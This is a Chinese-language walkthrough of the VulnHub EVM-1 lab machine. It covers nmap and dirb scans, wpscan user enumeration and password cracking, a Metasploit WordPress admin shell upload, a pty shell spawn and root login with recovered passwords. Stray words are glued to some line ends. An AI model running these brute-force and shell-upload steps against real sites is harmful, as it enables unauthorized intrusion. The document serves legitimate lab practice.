一.環境搭建
https://www.vulnhub.com/entry/evm-1,391/python
下載ova鏡像文件,vbox導入,設置兩張虛擬網卡,分別爲NAT模式和僅主機模式(改成默認網卡配置)linux
ip爲192.168.124.156
二.信息蒐集:
(端口掃描)ios
nmap -A 192.168.124.56 Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 EST Nmap scan report for localhost (192.168.124.56) Host is up (0.00035s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA) | 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA) |_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 110/tcp open pop3? 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: CAPABILITY 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) MAC Address: 00:0C:29:C4:5F:AA (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s |_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: ubuntu-extermely-vulnerable-m4ch1ine | NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00 | Domain name: \x00 | FQDN: ubuntu-extermely-vulnerable-m4ch1ine |_ System time: 2019-12-16T01:48:21-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-12-16 01:48:21 |_ start_date: N/A
(目錄掃描)
開始使用dirb進行目錄掃描dirb http://192.168.124.56/
web
從目錄掃描看出他有wordpress因此先試試以前使用過的工具wpscanshell
wpscan --url http://192.168.124.56/wordpress/ -e uubuntu
成功獲得帳號c0rrupt3d_brain,如今繼續破解他的密碼
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txtbash
成功破解出密碼24992499app
如今開始使用msfconsole 使用模塊dom
unix/webapp/wp_admin_shell_upload set RhOSTS 192.168.124.56 set USERNAME c0rrupt3d_brain set PassWORD 24992499 set targeturi /wordpress run
直接進入他的家目錄以後cd root3r 進來以後發現有一個文件彷佛是root密碼文件
ssh
如今進行查看發現彷佛是密碼,既然已經知道了密碼因此接下來進入交互頁面以下圖:
shell python -c "import pty;pty.spawn('/bin/bash')" su root
密碼輸入爲:willy26
成功拿到root